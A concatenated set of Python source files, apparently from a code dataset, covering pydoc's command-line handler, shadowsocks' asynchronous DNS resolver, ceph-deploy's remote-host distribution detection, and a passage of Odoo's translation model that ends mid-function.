# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'bk:p:w')
writing = False
start_server = False
open_browser = False
port = None
for opt, val in opts:
if opt == '-b':
start_server = True
open_browser = True
if opt == '-k':
apropos(val)
return
if opt == '-p':
start_server = True
port = val
if opt == '-w':
writing = True
if start_server:
if port is None:
port = 0
browse(port, open_browser=open_browser)
return
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print('file %r does not exist' % arg)
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport as value:
print(value)
except (getopt.error, BadUsage):
cmd = os.path.splitext(os.path.basename(sys.argv[0]))[0]
print("""pydoc - the Python documentation tool
{cmd} <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '{sep}', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
{cmd} -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
{cmd} -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
{cmd} -b
Start an HTTP server on an arbitrary unused port and open a Web browser
to interactively browse documentation. The -p option can be used with
the -b option to explicitly specify the server port.
{cmd} -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '{sep}', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""".format(cmd=cmd, sep=os.sep))
if __name__ == '__main__':
cli()
|
wshenx/shadowsocks
|
refs/heads/master
|
shadowsocks/asyncdns.py
|
655
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import socket
import struct
import re
import logging
from shadowsocks import common, lru_cache, eventloop, shell
CACHE_SWEEP_INTERVAL = 30
VALID_HOSTNAME = re.compile(br"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
common.patch_socket()
# rfc1035
# format
# +---------------------+
# | Header |
# +---------------------+
# | Question | the question for the name server
# +---------------------+
# | Answer | RRs answering the question
# +---------------------+
# | Authority | RRs pointing toward an authority
# +---------------------+
# | Additional | RRs holding additional information
# +---------------------+
#
# header
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ID |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# |QR| Opcode |AA|TC|RD|RA| Z | RCODE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | QDCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ANCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | NSCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ARCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
QTYPE_ANY = 255
QTYPE_A = 1
QTYPE_AAAA = 28
QTYPE_CNAME = 5
QTYPE_NS = 2
QCLASS_IN = 1
def build_address(address):
address = address.strip(b'.')
labels = address.split(b'.')
results = []
for label in labels:
l = len(label)
if l > 63:
return None
results.append(common.chr(l))
results.append(label)
results.append(b'\0')
return b''.join(results)
def build_request(address, qtype):
request_id = os.urandom(2)
header = struct.pack('!BBHHHH', 1, 0, 1, 0, 0, 0)
addr = build_address(address)
qtype_qclass = struct.pack('!HH', qtype, QCLASS_IN)
return request_id + header + addr + qtype_qclass
def parse_ip(addrtype, data, length, offset):
if addrtype == QTYPE_A:
return socket.inet_ntop(socket.AF_INET, data[offset:offset + length])
elif addrtype == QTYPE_AAAA:
return socket.inet_ntop(socket.AF_INET6, data[offset:offset + length])
elif addrtype in [QTYPE_CNAME, QTYPE_NS]:
return parse_name(data, offset)[1]
else:
return data[offset:offset + length]
def parse_name(data, offset):
p = offset
labels = []
l = common.ord(data[p])
while l > 0:
if (l & (128 + 64)) == (128 + 64):
# pointer
pointer = struct.unpack('!H', data[p:p + 2])[0]
pointer &= 0x3FFF
r = parse_name(data, pointer)
labels.append(r[1])
p += 2
# pointer is the end
return p - offset, b'.'.join(labels)
else:
labels.append(data[p + 1:p + 1 + l])
p += 1 + l
l = common.ord(data[p])
return p - offset + 1, b'.'.join(labels)
# rfc1035
# record
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | |
# / /
# / NAME /
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TYPE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | CLASS |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TTL |
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | RDLENGTH |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
# / RDATA /
# / /
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
def parse_record(data, offset, question=False):
nlen, name = parse_name(data, offset)
if not question:
record_type, record_class, record_ttl, record_rdlength = struct.unpack(
'!HHiH', data[offset + nlen:offset + nlen + 10]
)
ip = parse_ip(record_type, data, record_rdlength, offset + nlen + 10)
return nlen + 10 + record_rdlength, \
(name, ip, record_type, record_class, record_ttl)
else:
record_type, record_class = struct.unpack(
'!HH', data[offset + nlen:offset + nlen + 4]
)
return nlen + 4, (name, None, record_type, record_class, None, None)
def parse_header(data):
if len(data) >= 12:
header = struct.unpack('!HBBHHHH', data[:12])
res_id = header[0]
res_qr = header[1] & 128
res_tc = header[1] & 2
res_ra = header[2] & 128
res_rcode = header[2] & 15
# assert res_tc == 0
# assert res_rcode in [0, 3]
res_qdcount = header[3]
res_ancount = header[4]
res_nscount = header[5]
res_arcount = header[6]
return (res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount,
res_ancount, res_nscount, res_arcount)
return None
def parse_response(data):
try:
if len(data) >= 12:
header = parse_header(data)
if not header:
return None
res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount, \
res_ancount, res_nscount, res_arcount = header
qds = []
ans = []
offset = 12
for i in range(0, res_qdcount):
l, r = parse_record(data, offset, True)
offset += l
if r:
qds.append(r)
for i in range(0, res_ancount):
l, r = parse_record(data, offset)
offset += l
if r:
ans.append(r)
for i in range(0, res_nscount):
l, r = parse_record(data, offset)
offset += l
for i in range(0, res_arcount):
l, r = parse_record(data, offset)
offset += l
response = DNSResponse()
if qds:
response.hostname = qds[0][0]
for an in qds:
response.questions.append((an[1], an[2], an[3]))
for an in ans:
response.answers.append((an[1], an[2], an[3]))
return response
except Exception as e:
shell.print_exception(e)
return None
def is_valid_hostname(hostname):
if len(hostname) > 255:
return False
if hostname[-1] == b'.':
hostname = hostname[:-1]
return all(VALID_HOSTNAME.match(x) for x in hostname.split(b'.'))
class DNSResponse(object):
def __init__(self):
self.hostname = None
self.questions = [] # each: (addr, type, class)
self.answers = [] # each: (addr, type, class)
def __str__(self):
return '%s: %s' % (self.hostname, str(self.answers))
STATUS_IPV4 = 0
STATUS_IPV6 = 1
class DNSResolver(object):
def __init__(self, server_list=None):
self._loop = None
self._hosts = {}
self._hostname_status = {}
self._hostname_to_cb = {}
self._cb_to_hostname = {}
self._cache = lru_cache.LRUCache(timeout=300)
self._sock = None
if server_list is None:
self._servers = None
self._parse_resolv()
else:
self._servers = server_list
self._parse_hosts()
# TODO monitor hosts change and reload hosts
# TODO parse /etc/gai.conf and follow its rules
def _parse_resolv(self):
self._servers = []
try:
with open('/etc/resolv.conf', 'rb') as f:
content = f.readlines()
for line in content:
line = line.strip()
if line:
if line.startswith(b'nameserver'):
parts = line.split()
if len(parts) >= 2:
server = parts[1]
if common.is_ip(server) == socket.AF_INET:
if type(server) != str:
server = server.decode('utf8')
self._servers.append(server)
except IOError:
pass
if not self._servers:
self._servers = ['8.8.4.4', '8.8.8.8']
def _parse_hosts(self):
etc_path = '/etc/hosts'
if 'WINDIR' in os.environ:
etc_path = os.environ['WINDIR'] + '/system32/drivers/etc/hosts'
try:
with open(etc_path, 'rb') as f:
for line in f.readlines():
line = line.strip()
parts = line.split()
if len(parts) >= 2:
ip = parts[0]
if common.is_ip(ip):
for i in range(1, len(parts)):
hostname = parts[i]
if hostname:
self._hosts[hostname] = ip
except IOError:
self._hosts['localhost'] = '127.0.0.1'
def add_to_loop(self, loop):
if self._loop:
raise Exception('already add to loop')
self._loop = loop
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
loop.add(self._sock, eventloop.POLL_IN, self)
loop.add_periodic(self.handle_periodic)
def _call_callback(self, hostname, ip, error=None):
callbacks = self._hostname_to_cb.get(hostname, [])
for callback in callbacks:
if callback in self._cb_to_hostname:
del self._cb_to_hostname[callback]
if ip or error:
callback((hostname, ip), error)
else:
callback((hostname, None),
Exception('unknown hostname %s' % hostname))
if hostname in self._hostname_to_cb:
del self._hostname_to_cb[hostname]
if hostname in self._hostname_status:
del self._hostname_status[hostname]
def _handle_data(self, data):
response = parse_response(data)
if response and response.hostname:
hostname = response.hostname
ip = None
for answer in response.answers:
if answer[1] in (QTYPE_A, QTYPE_AAAA) and \
answer[2] == QCLASS_IN:
ip = answer[0]
break
if not ip and self._hostname_status.get(hostname, STATUS_IPV6) \
== STATUS_IPV4:
self._hostname_status[hostname] = STATUS_IPV6
self._send_req(hostname, QTYPE_AAAA)
else:
if ip:
self._cache[hostname] = ip
self._call_callback(hostname, ip)
elif self._hostname_status.get(hostname, None) == STATUS_IPV6:
for question in response.questions:
if question[1] == QTYPE_AAAA:
self._call_callback(hostname, None)
break
def handle_event(self, sock, fd, event):
if sock != self._sock:
return
if event & eventloop.POLL_ERR:
logging.error('dns socket err')
self._loop.remove(self._sock)
self._sock.close()
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
self._loop.add(self._sock, eventloop.POLL_IN, self)
else:
data, addr = sock.recvfrom(1024)
if addr[0] not in self._servers:
logging.warn('received a packet other than our dns')
return
self._handle_data(data)
def handle_periodic(self):
self._cache.sweep()
def remove_callback(self, callback):
hostname = self._cb_to_hostname.get(callback)
if hostname:
del self._cb_to_hostname[callback]
arr = self._hostname_to_cb.get(hostname, None)
if arr:
arr.remove(callback)
if not arr:
del self._hostname_to_cb[hostname]
if hostname in self._hostname_status:
del self._hostname_status[hostname]
def _send_req(self, hostname, qtype):
req = build_request(hostname, qtype)
for server in self._servers:
logging.debug('resolving %s with type %d using server %s',
hostname, qtype, server)
self._sock.sendto(req, (server, 53))
def resolve(self, hostname, callback):
if type(hostname) != bytes:
hostname = hostname.encode('utf8')
if not hostname:
callback(None, Exception('empty hostname'))
elif common.is_ip(hostname):
callback((hostname, hostname), None)
elif hostname in self._hosts:
logging.debug('hit hosts: %s', hostname)
ip = self._hosts[hostname]
callback((hostname, ip), None)
elif hostname in self._cache:
logging.debug('hit cache: %s', hostname)
ip = self._cache[hostname]
callback((hostname, ip), None)
else:
if not is_valid_hostname(hostname):
callback(None, Exception('invalid hostname: %s' % hostname))
return
arr = self._hostname_to_cb.get(hostname, None)
if not arr:
self._hostname_status[hostname] = STATUS_IPV4
self._send_req(hostname, QTYPE_A)
self._hostname_to_cb[hostname] = [callback]
self._cb_to_hostname[callback] = hostname
else:
arr.append(callback)
# TODO send again only if waited too long
self._send_req(hostname, QTYPE_A)
def close(self):
if self._sock:
if self._loop:
self._loop.remove_periodic(self.handle_periodic)
self._loop.remove(self._sock)
self._sock.close()
self._sock = None
def test():
dns_resolver = DNSResolver()
loop = eventloop.EventLoop()
dns_resolver.add_to_loop(loop)
global counter
counter = 0
def make_callback():
global counter
def callback(result, error):
global counter
# TODO: what can we assert?
print(result, error)
counter += 1
if counter == 9:
dns_resolver.close()
loop.stop()
a_callback = callback
return a_callback
assert(make_callback() != make_callback())
dns_resolver.resolve(b'google.com', make_callback())
dns_resolver.resolve('google.com', make_callback())
dns_resolver.resolve('example.com', make_callback())
dns_resolver.resolve('ipv6.google.com', make_callback())
dns_resolver.resolve('www.facebook.com', make_callback())
dns_resolver.resolve('ns2.google.com', make_callback())
dns_resolver.resolve('invalid.@!#$%^&$@.hostname', make_callback())
dns_resolver.resolve('toooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'long.hostname', make_callback())
dns_resolver.resolve('toooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'long.hostname', make_callback())
loop.run()
if __name__ == '__main__':
test()
|
codenrhoden/ceph-deploy
|
refs/heads/master
|
ceph_deploy/hosts/__init__.py
|
9
|
"""
We deal (mostly) with remote hosts. To avoid special casing each different
commands (e.g. using `yum` as opposed to `apt`) we can make a one time call to
that remote host and set all the special cases for running commands depending
on the type of distribution/version we are dealing with.
"""
import logging
from ceph_deploy import exc
from ceph_deploy.util import versions
from ceph_deploy.hosts import debian, centos, fedora, suse, remotes, rhel
from ceph_deploy.connection import get_connection
logger = logging.getLogger()
def get(hostname,
username=None,
fallback=None,
detect_sudo=True,
use_rhceph=False,
callbacks=None):
"""
Retrieve the module that matches the distribution of a ``hostname``. This
function will connect to that host and retrieve the distribution
information, then return the appropriate module and slap a few attributes
to that module defining the information it found from the hostname.
For example, if host ``node1.example.com`` is an Ubuntu server, the
``debian`` module would be returned and the following would be set::
module.name = 'ubuntu'
module.release = '12.04'
module.codename = 'precise'
:param hostname: A hostname that is reachable/resolvable over the network
:param fallback: Optional fallback to use if no supported distro is found
:param use_rhceph: Whether or not to install RH Ceph on a RHEL machine or
the community distro. Changes what host module is
returned for RHEL.
:params callbacks: A list of callables that accept one argument (the actual
module that contains the connection) that will be
called, in order at the end of the instantiation of the
module.
"""
conn = get_connection(
hostname,
username=username,
logger=logging.getLogger(hostname),
detect_sudo=detect_sudo
)
try:
conn.import_module(remotes)
except IOError as error:
if 'already closed' in getattr(error, 'message', ''):
raise RuntimeError('remote connection got closed, ensure ``requiretty`` is disabled for %s' % hostname)
distro_name, release, codename = conn.remote_module.platform_information()
if not codename or not _get_distro(distro_name):
raise exc.UnsupportedPlatform(
distro=distro_name,
codename=codename,
release=release)
machine_type = conn.remote_module.machine_type()
module = _get_distro(distro_name, use_rhceph=use_rhceph)
module.name = distro_name
module.normalized_name = _normalized_distro_name(distro_name)
module.normalized_release = _normalized_release(release)
module.distro = module.normalized_name
module.is_el = module.normalized_name in ['redhat', 'centos', 'fedora', 'scientific']
module.is_rpm = module.normalized_name in ['redhat', 'centos',
'fedora', 'scientific', 'suse']
module.is_deb = not module.is_rpm
module.release = release
module.codename = codename
module.conn = conn
module.machine_type = machine_type
module.init = module.choose_init(module)
module.packager = module.get_packager(module)
# execute each callback if any
if callbacks:
for c in callbacks:
c(module)
return module
def _get_distro(distro, fallback=None, use_rhceph=False):
if not distro:
return
distro = _normalized_distro_name(distro)
distributions = {
'debian': debian,
'ubuntu': debian,
'centos': centos,
'scientific': centos,
'redhat': centos,
'fedora': fedora,
'suse': suse,
}
if distro == 'redhat' and use_rhceph:
return rhel
else:
return distributions.get(distro) or _get_distro(fallback)
def _normalized_distro_name(distro):
distro = distro.lower()
if distro.startswith(('redhat', 'red hat')):
return 'redhat'
elif distro.startswith(('scientific', 'scientific linux')):
return 'scientific'
elif distro.startswith(('suse', 'opensuse')):
return 'suse'
elif distro.startswith('centos'):
return 'centos'
elif distro.startswith('linuxmint'):
return 'ubuntu'
return distro
def _normalized_release(release):
"""
A normalizer function to make sense of distro
release versions.
Returns an object with: major, minor, patch, and garbage
These attributes can be accessed as ints with prefixed "int"
attribute names, for example:
normalized_version.int_major
"""
# TODO: at some point deprecate this function so that we just
# use this class directly (and update every test that calls it
return versions.NormalizedVersion(release)
|
Therp/odoo
|
refs/heads/8.0
|
openerp/addons/base/ir/ir_translation.py
|
7
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp import tools
import openerp.modules
from openerp.osv import fields, osv
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
TRANSLATION_TYPE = [
('field', 'Field'),
('model', 'Object'),
('rml', 'RML (deprecated - use Report)'), # Pending deprecation - to be replaced by report!
('report', 'Report/Template'),
('selection', 'Selection'),
('view', 'View'),
('wizard_button', 'Wizard Button'),
('wizard_field', 'Wizard Field'),
('wizard_view', 'Wizard View'),
('xsl', 'XSL'),
('help', 'Help'),
('code', 'Code'),
('constraint', 'Constraint'),
('sql_constraint', 'SQL Constraint')
]
class ir_translation_import_cursor(object):
"""Temporary cursor for optimizing mass insert into ir.translation
Open it (attached to a sql cursor), feed it with translation data and
finish() it in order to insert multiple translations in a batch.
"""
_table_name = 'tmp_ir_translation_import'
def __init__(self, cr, uid, parent, context):
""" Initializer
Store some values, and also create a temporary SQL table to accept
the data.
@param parent an instance of ir.translation ORM model
"""
self._cr = cr
self._uid = uid
self._context = context
self._overwrite = context.get('overwrite', False)
self._debug = False
self._parent_table = parent._table
# Note that Postgres will NOT inherit the constraints or indexes
# of ir_translation, so this copy will be much faster.
cr.execute('''CREATE TEMP TABLE %s(
imd_model VARCHAR(64),
imd_name VARCHAR(128)
) INHERITS (%s) ''' % (self._table_name, self._parent_table))
def push(self, trans_dict):
"""Feed a translation, as a dictionary, into the cursor
"""
params = dict(trans_dict, state="translated" if trans_dict['value'] else "to_translate")
if params['type'] == 'view':
# ugly hack for QWeb views - pending refactoring of translations in master
if params['imd_model'] == 'website':
params['imd_model'] = "ir.ui.view"
# non-QWeb views do not need a matching res_id -> force to 0 to avoid dropping them
elif params['res_id'] is None:
params['res_id'] = 0
self._cr.execute("""INSERT INTO %s (name, lang, res_id, src, type, imd_model, module, imd_name, value, state, comments)
VALUES (%%(name)s, %%(lang)s, %%(res_id)s, %%(src)s, %%(type)s, %%(imd_model)s, %%(module)s,
%%(imd_name)s, %%(value)s, %%(state)s, %%(comments)s)""" % self._table_name,
params)
def finish(self):
""" Transfer the data from the temp table to ir.translation
"""
cr = self._cr
if self._debug:
cr.execute("SELECT count(*) FROM %s" % self._table_name)
c = cr.fetchone()[0]
_logger.debug("ir.translation.cursor: We have %d entries to process", c)
# Step 1: resolve ir.model.data references to res_ids
cr.execute("""UPDATE %s AS ti
SET res_id = imd.res_id
FROM ir_model_data AS imd
WHERE ti.res_id IS NULL
AND ti.module IS NOT NULL AND ti.imd_name IS NOT NULL
AND ti.module = imd.module AND ti.imd_name = imd.name
AND ti.imd_model = imd.model; """ % self._table_name)
if self._debug:
cr.execute("SELECT module, imd_name, imd_model FROM %s " \
"WHERE res_id IS NULL AND module IS NOT NULL" % self._table_name)
for row in cr.fetchall():
_logger.info("ir.translation.cursor: missing res_id for %s.%s <%s> ", *row)
# Records w/o res_id must _not_ be inserted into our db, because they are
# referencing non-existent data.
cr.execute("DELETE FROM %s WHERE res_id IS NULL AND module IS NOT NULL" % \
self._table_name)
find_expr = "irt.lang = ti.lang AND irt.type = ti.type " \
" AND irt.name = ti.name AND irt.src = ti.src " \
" AND irt.module = ti.module " \
" AND ( " \
" (ti.type NOT IN ('model', 'view')) " \
" OR (ti.type = 'model' AND ti.res_id = irt.res_id) " \
" OR (ti.type = 'view' AND irt.res_id IS NULL) " \
" OR (ti.type = 'view' AND irt.res_id IS NOT NULL AND ti.res_id = irt.res_id)) "
# Step 2: update existing (matching) translations
if self._overwrite:
cr.execute("""UPDATE ONLY %s AS irt
SET value = ti.value,
state = 'translated'
FROM %s AS ti
WHERE %s AND ti.value IS NOT NULL AND ti.value != ''
""" % (self._parent_table, self._table_name, find_expr))
# Step 3: insert new translations
cr.execute("""INSERT INTO %s(name, lang, res_id, src, type, value, module, state, comments)
SELECT name, lang, res_id, src, type, value, module, state, comments
FROM %s AS ti
WHERE NOT EXISTS(SELECT 1 FROM ONLY %s AS irt WHERE %s);
""" % (self._parent_table, self._table_name, self._parent_table, find_expr))
if self._debug:
cr.execute('SELECT COUNT(*) FROM ONLY %s' % self._parent_table)
c1 = cr.fetchone()[0]
cr.execute('SELECT COUNT(*) FROM ONLY %s AS irt, %s AS ti WHERE %s' % \
(self._parent_table, self._table_name, find_expr))
c = cr.fetchone()[0]
_logger.debug("ir.translation.cursor: %d entries now in ir.translation, %d common entries with tmp", c1, c)
# Step 4: cleanup
cr.execute("DROP TABLE %s" % self._table_name)
return True
class ir_translation(osv.osv):
_name = "ir.translation"
_log_access = False
def _get_language(self, cr, uid, context):
lang_model = self.pool.get('res.lang')
lang_ids = lang_model.search(cr, uid, [('translatable', '=', True)], context=context)
lang_data = lang_model.read(cr, uid, lang_ids, ['code', 'name'], context=context)
return [(d['code'], d['name']) for d in lang_data]
def _get_src(self, cr, uid, ids, name, arg, context=None):
''' Get source name for the translation. If object type is model then
return the value store in db. Otherwise return value store in src field
'''
if context is None:
context = {}
res = dict.fromkeys(ids, False)
for record in self.browse(cr, uid, ids, context=context):
if record.type != 'model':
res[record.id] = record.src
else:
model_name, field = record.name.split(',')
model = self.pool.get(model_name)
if model is not None:
# Pass context without lang, need to read real stored field, not translation
context_no_lang = dict(context, lang=None)
result = model.read(cr, uid, [record.res_id], [field], context=context_no_lang)
res[record.id] = result[0][field] if result else False
return res
def _set_src(self, cr, uid, id, name, value, args, context=None):
''' When changing source term of a translation, change its value in db for
the associated object, and the src field
'''
if context is None:
context = {}
record = self.browse(cr, uid, id, context=context)
if record.type == 'model':
model_name, field = record.name.split(',')
model = self.pool.get(model_name)
#We need to take the context without the language information, because we want to write on the
#value store in db and not on the one associate with current language.
#Also not removing lang from context trigger an error when lang is different
context_wo_lang = context.copy()
context_wo_lang.pop('lang', None)
model.write(cr, uid, record.res_id, {field: value}, context=context_wo_lang)
return self.write(cr, uid, id, {'src': value}, context=context)
_columns = {
'name': fields.char('Translated field', required=True),
'res_id': fields.integer('Record ID', select=True),
'lang': fields.selection(_get_language, string='Language'),
'type': fields.selection(TRANSLATION_TYPE, string='Type', select=True),
'src': fields.text('Old source'),
'source': fields.function(_get_src, fnct_inv=_set_src, type='text', string='Source'),
'value': fields.text('Translation Value'),
'module': fields.char('Module', help="Module this term belongs to", select=True),
'state': fields.selection(
[('to_translate','To Translate'),
('inprogress','Translation in Progress'),
('translated','Translated')],
string="Status",
help="Automatically set to let administators find new terms that might need to be translated"),
# aka gettext extracted-comments - we use them to flag openerp-web translation
# cfr: http://www.gnu.org/savannah-checkouts/gnu/gettext/manual/html_node/PO-Files.html
'comments': fields.text('Translation comments', select=True),
}
_defaults = {
'state': 'to_translate',
}
_sql_constraints = [ ('lang_fkey_res_lang', 'FOREIGN KEY(lang) REFERENCES res_lang(code)',
'Language code of translation item must be among known languages' ), ]
def _auto_init(self, cr, context=None):
super(ir_translation, self)._auto_init(cr, context)
# FIXME: there is a size limit on btree indexed values so we can't index src column with normal btree.
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_translation_ltns',))
if cr.fetchone():
#temporarily removed: cr.execute('CREATE INDEX ir_translation_ltns ON ir_translation (name, lang, type, src)')
cr.execute('DROP INDEX ir_translation_ltns')
cr.commit()
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_translation_lts',))
if cr.fetchone():
#temporarily removed: cr.execute('CREATE INDEX ir_translation_lts ON ir_translation (lang, type, src)')
cr.execute('DROP INDEX ir_translation_lts')
cr.commit()
# add separate hash index on src (no size limit on values), as postgres 8.1+ is able to combine separate indexes
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_translation_src_hash_idx',))
if not cr.fetchone():
cr.execute('CREATE INDEX ir_translation_src_hash_idx ON ir_translation using hash (src)')
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_translation_ltn',))
if not cr.fetchone():
cr.execute('CREATE INDEX ir_translation_ltn ON ir_translation (name, lang, type)')
cr.commit()
def _check_selection_field_value(self, cr, uid, field, value, context=None):
if field == 'lang':
return
return super(ir_translation, self)._check_selection_field_value(cr, uid, field, value, context=context)
@tools.ormcache_multi(skiparg=3, multi=6)
def _get_ids(self, cr, uid, name, tt, lang, ids):
translations = dict.fromkeys(ids, False)
if ids:
cr.execute('select res_id,value '
'from ir_translation '
'where lang=%s '
'and type=%s '
'and name=%s '
'and res_id IN %s',
(lang,tt,name,tuple(ids)))
for res_id, value in cr.fetchall():
translations[res_id] = value
return translations
def _set_ids(self, cr, uid, name, tt, lang, ids, value, src=None):
self._get_ids.clear_cache(self)
self._get_source.clear_cache(self)
cr.execute('delete from ir_translation '
'where lang=%s '
'and type=%s '
'and name=%s '
'and res_id IN %s',
(lang,tt,name,tuple(ids),))
for id in ids:
self.create(cr, uid, {
'lang':lang,
'type':tt,
'name':name,
'res_id':id,
'value':value,
'src':src,
})
return len(ids)
def _get_source_query(self, cr, uid, name, types, lang, source, res_id):
if source:
query = """SELECT value
FROM ir_translation
WHERE lang=%s
AND type in %s
AND src=%s"""
params = (lang or '', types, tools.ustr(source))
if res_id:
if isinstance(res_id, (int, long)):
res_id = (res_id,)
else:
res_id = tuple(res_id)
query += " AND res_id in %s"
params += (res_id,)
if name:
query += " AND name=%s"
params += (tools.ustr(name),)
else:
query = """SELECT value
FROM ir_translation
WHERE lang=%s
AND type in %s
AND name=%s"""
params = (lang or '', types, tools.ustr(name))
return (query, params)
@tools.ormcache(skiparg=3)
def _get_source(self, cr, uid, name, types, lang, source=None, res_id=None):
"""
Returns the translation for the given combination of name, type, language
and source. All values passed to this method should be unicode (not byte strings),
especially ``source``.
:param name: identification of the term to translate, such as field name (optional if source is passed)
:param types: single string defining type of term to translate (see ``type`` field on ir.translation), or sequence of allowed types (strings)
:param lang: language code of the desired translation
:param source: optional source term to translate (should be unicode)
:param res_id: optional resource id or a list of ids to translate (if used, ``source`` should be set)
:rtype: unicode
:return: the request translation, or an empty unicode string if no translation was
found and `source` was not passed
"""
# FIXME: should assert that `source` is unicode and fix all callers to always pass unicode
# so we can remove the string encoding/decoding.
if not lang:
return tools.ustr(source or '')
if isinstance(types, basestring):
types = (types,)
query, params = self._get_source_query(cr, uid, name, types, lang, source, res_id)
cr.execute(query, params)
res = cr.fetchone()
trad = res and res[0] or u''
if source and not trad:
return tools.ustr(source)
return trad
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
ids = super(ir_translation, self).create(cr, uid, vals, context=context)
self._get_source.clear_cache(self)
self._get_ids.clear_cache(self)
self.pool['ir.ui.view'].clear_cache()
return ids
def write(self, cursor, user, ids, vals, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if vals.get('src') or ('value' in vals and not(vals.get('value'))):
vals.update({'state':'to_translate'})
if vals.get('value'):
vals.update({'state':'translated'})
result = super(ir_translation, self).write(cursor, user, ids, vals, context=context)
self._get_source.clear_cache(self)
self._get_ids.clear_cache(self)
self.pool['ir.ui.view'].clear_cache()
return result
def unlink(self, cursor, user, ids, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
self._get_source.clear_cache(self)
self._get_ids.clear_cache(self)
result = super(ir_translation, self).unlink(cursor, user, ids, context=context)
return result
def translate_fields(self, cr, uid, model, id, field=None, context=None):
trans_model = self.pool[model]
domain = ['&', ('res_id', '=', id), ('name', '=like', model + ',%')]
langs_ids = self.pool.get('res.lang').search(cr, uid, [('code', '!=', 'en_US')], context=context)
if not langs_ids:
raise osv.except_osv(_('Error'), _("Translation features are unavailable until you install an extra OpenERP translation."))
langs = [lg.code for lg in self.pool.get('res.lang').browse(cr, uid, langs_ids, context=context)]
main_lang = 'en_US'
translatable_fields = []
for k, f in trans_model._fields.items():
if getattr(f, 'translate', False):
if f.inherited:
parent_id = trans_model.read(cr, uid, [id], [f.related[0]], context=context)[0][f.related[0]][0]
translatable_fields.append({'name': k, 'id': parent_id, 'model': f.base_field.model_name})
domain.insert(0, '|')
domain.extend(['&', ('res_id', '=', parent_id), ('name', '=', "%s,%s" % (f.base_field.model_name, k))])
else:
